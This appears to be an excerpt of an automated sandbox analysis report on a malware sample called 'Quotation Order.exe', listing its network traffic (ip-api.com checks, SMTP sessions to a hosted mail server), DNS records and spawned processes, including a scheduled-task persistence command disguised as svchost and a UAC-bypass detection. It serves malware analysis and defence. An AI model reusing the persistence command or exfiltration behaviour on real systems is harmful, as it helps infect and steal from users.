                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:42.882472992 CEST49721587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:42.882528067 CEST49721587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:42.882567883 CEST49721587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:42.882594109 CEST49721587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:42.882621050 CEST49721587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:42.882642031 CEST49721587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:43.078429937 CEST58749721192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:43.078447104 CEST58749721192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:43.078460932 CEST58749721192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:43.078474045 CEST58749721192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:43.078778982 CEST58749721192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:43.079422951 CEST58749721192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:43.183640957 CEST49721587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:08:13.449878931 CEST4971580192.168.2.10208.95.112.1
                                                                                                                                                                                                                                                  Apr 26, 2024 10:08:13.601846933 CEST8049715208.95.112.1192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:08:13.601942062 CEST4971580192.168.2.10208.95.112.1
                                                                                                                                                                                                                                                  Apr 26, 2024 10:08:30.371752024 CEST4971980192.168.2.10208.95.112.1
                                                                                                                                                                                                                                                  Apr 26, 2024 10:08:30.523267031 CEST8049719208.95.112.1192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:08:30.523401976 CEST4971980192.168.2.10208.95.112.1
                                                                                                                                                                                                                                                  Apr 26, 2024 10:09:03.465676069 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:09:03.704371929 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:09:04.092318058 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:09:04.095932961 CEST49717587192.168.2.10192.254.225.166

                                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:11.054128885 CEST6044753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:11.179255009 CEST53604471.1.1.1192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:12.759141922 CEST5393453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:12.970603943 CEST53539341.1.1.1192.168.2.10

                                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:11.054128885 CEST192.168.2.101.1.1.10xc6c3Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:12.759141922 CEST192.168.2.101.1.1.10xc9a7Standard query (0)mail.bonnyriggdentalsurgery.com.auA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:11.179255009 CEST1.1.1.1192.168.2.100xc6c3No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:12.970603943 CEST1.1.1.1192.168.2.100xc9a7No error (0)mail.bonnyriggdentalsurgery.com.au192.254.225.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:13.395530939 CEST1.1.1.1192.168.2.100x7bd1No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:13.395530939 CEST1.1.1.1192.168.2.100x7bd1No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Apr 26, 2024 10:08:14.741743088 CEST1.1.1.1192.168.2.100xa026No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Apr 26, 2024 10:08:14.741743088 CEST1.1.1.1192.168.2.100xa026No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                                  • ip-api.com

                                                                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  0192.168.2.1049701208.95.112.1807440C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:11.343307018 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                                                  Host: ip-api.com
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:11.499897003 CEST175INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 26 Apr 2024 08:07:11 GMT
                                                                                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 6
                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                  X-Ttl: 18
                                                                                                                                                                                                                                                  X-Rl: 43
                                                                                                                                                                                                                                                  Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                                                                                                  Data Ascii: false


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  1192.168.2.1049705208.95.112.1807976C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:13.768683910 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                                                  Host: ip-api.com
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:13.922867060 CEST175INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 26 Apr 2024 08:07:13 GMT
                                                                                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 6
                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                  X-Ttl: 16
                                                                                                                                                                                                                                                  X-Rl: 42
                                                                                                                                                                                                                                                  Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                                                                                                  Data Ascii: false


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  2192.168.2.1049715208.95.112.1807240C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:22.318850040 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                                                  Host: ip-api.com
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:22.472193003 CEST174INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 26 Apr 2024 08:07:22 GMT
                                                                                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 6
                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                  X-Ttl: 7
                                                                                                                                                                                                                                                  X-Rl: 41
                                                                                                                                                                                                                                                  Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                                                                                                  Data Ascii: false


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  3192.168.2.1049719208.95.112.1804884C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:39.300117970 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                                                  Host: ip-api.com
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:39.453018904 CEST175INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 26 Apr 2024 08:07:39 GMT
                                                                                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 6
                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                  X-Ttl: 60
                                                                                                                                                                                                                                                  X-Rl: 44
                                                                                                                                                                                                                                                  Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                                                                                                  Data Ascii: false


                                                                                                                                                                                                                                                  SMTP Packets

                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:13.443326950 CEST58749703192.254.225.166192.168.2.10220-gator3119.hostgator.com ESMTP Exim 4.95 #2 Fri, 26 Apr 2024 03:07:13 -0500
                                                                                                                                                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                  220 and/or bulk e-mail.
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:13.443790913 CEST49703587192.168.2.10192.254.225.166EHLO 878411
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:13.640345097 CEST58749703192.254.225.166192.168.2.10250-gator3119.hostgator.com Hello 878411 [102.129.152.220]
                                                                                                                                                                                                                                                  250-SIZE 52428800
                                                                                                                                                                                                                                                  250-8BITMIME
                                                                                                                                                                                                                                                  250-PIPELINING
                                                                                                                                                                                                                                                  250-PIPE_CONNECT
                                                                                                                                                                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                                                                                                                                                                  250-STARTTLS
                                                                                                                                                                                                                                                  250 HELP
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:13.640543938 CEST49703587192.168.2.10192.254.225.166STARTTLS
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:13.842605114 CEST58749703192.254.225.166192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:15.745795012 CEST58749708192.254.225.166192.168.2.10220-gator3119.hostgator.com ESMTP Exim 4.95 #2 Fri, 26 Apr 2024 03:07:15 -0500
                                                                                                                                                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                  220 and/or bulk e-mail.
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:15.745964050 CEST49708587192.168.2.10192.254.225.166EHLO 878411
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:15.942356110 CEST58749708192.254.225.166192.168.2.10250-gator3119.hostgator.com Hello 878411 [102.129.152.220]
                                                                                                                                                                                                                                                  250-SIZE 52428800
                                                                                                                                                                                                                                                  250-8BITMIME
                                                                                                                                                                                                                                                  250-PIPELINING
                                                                                                                                                                                                                                                  250-PIPE_CONNECT
                                                                                                                                                                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                                                                                                                                                                  250-STARTTLS
                                                                                                                                                                                                                                                  250 HELP
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:15.943594933 CEST49708587192.168.2.10192.254.225.166STARTTLS
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:16.141052008 CEST58749708192.254.225.166192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:23.893275023 CEST58749717192.254.225.166192.168.2.10220-gator3119.hostgator.com ESMTP Exim 4.95 #2 Fri, 26 Apr 2024 03:07:23 -0500
                                                                                                                                                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                  220 and/or bulk e-mail.
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:23.893517971 CEST49717587192.168.2.10192.254.225.166EHLO 878411
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:24.089807987 CEST58749717192.254.225.166192.168.2.10250-gator3119.hostgator.com Hello 878411 [102.129.152.220]
                                                                                                                                                                                                                                                  250-SIZE 52428800
                                                                                                                                                                                                                                                  250-8BITMIME
                                                                                                                                                                                                                                                  250-PIPELINING
                                                                                                                                                                                                                                                  250-PIPE_CONNECT
                                                                                                                                                                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                                                                                                                                                                  250-STARTTLS
                                                                                                                                                                                                                                                  250 HELP
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:24.090234995 CEST49717587192.168.2.10192.254.225.166STARTTLS
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:24.287837982 CEST58749717192.254.225.166192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:40.805790901 CEST58749721192.254.225.166192.168.2.10220-gator3119.hostgator.com ESMTP Exim 4.95 #2 Fri, 26 Apr 2024 03:07:40 -0500
                                                                                                                                                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                  220 and/or bulk e-mail.
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:40.807872057 CEST49721587192.168.2.10192.254.225.166EHLO 878411
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:41.017981052 CEST58749721192.254.225.166192.168.2.10250-gator3119.hostgator.com Hello 878411 [102.129.152.220]
                                                                                                                                                                                                                                                  250-SIZE 52428800
                                                                                                                                                                                                                                                  250-8BITMIME
                                                                                                                                                                                                                                                  250-PIPELINING
                                                                                                                                                                                                                                                  250-PIPE_CONNECT
                                                                                                                                                                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                                                                                                                                                                  250-STARTTLS
                                                                                                                                                                                                                                                  250 HELP
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:41.018157959 CEST49721587192.168.2.10192.254.225.166STARTTLS
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:41.215791941 CEST58749721192.254.225.166192.168.2.10220 TLS go ahead

                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                  Start time:10:07:01
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\Quotation Order.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\Quotation Order.exe"
                                                                                                                                                                                                                                                  Imagebase:0x259e98c0000
                                                                                                                                                                                                                                                  File size:912'780 bytes
                                                                                                                                                                                                                                                  MD5 hash:D797AAE1EAF481E9C887482192B84109
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1287260691.0000025980041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                  Start time:10:07:01
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                  Start time:10:07:01
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                                                                                                  Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                  Start time:10:07:02
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                                                                                  Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                  Start time:10:07:02
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                                                                                                                                  Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                  Start time:10:07:03
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                                                                                                                                                                  Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                  Start time:10:07:03
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
                                                                                                                                                                                                                                                  Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                  Start time:10:07:03
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
                                                                                                                                                                                                                                                  Imagebase:0x7ff64d530000
                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                  Start time:10:07:03
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                  Start time:10:07:03
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp25B.tmp.bat""
                                                                                                                                                                                                                                                  Imagebase:0x7ff64d530000
                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                  Start time:10:07:03
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                  Start time:10:07:03
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
                                                                                                                                                                                                                                                  Imagebase:0x7ff7eceb0000
                                                                                                                                                                                                                                                  File size:235'008 bytes
                                                                                                                                                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                  Start time:10:07:03
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:timeout 3
                                                                                                                                                                                                                                                  Imagebase:0x7ff6738f0000
                                                                                                                                                                                                                                                  File size:32'768 bytes
                                                                                                                                                                                                                                                  MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                                  Start time:10:07:04
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                                  Imagebase:0x153be690000
                                                                                                                                                                                                                                                  File size:912'780 bytes
                                                                                                                                                                                                                                                  MD5 hash:D797AAE1EAF481E9C887482192B84109
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.1482838005.00000153C09BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 32%, ReversingLabs
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                                  Start time:10:07:05
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                                  Start time:10:07:06
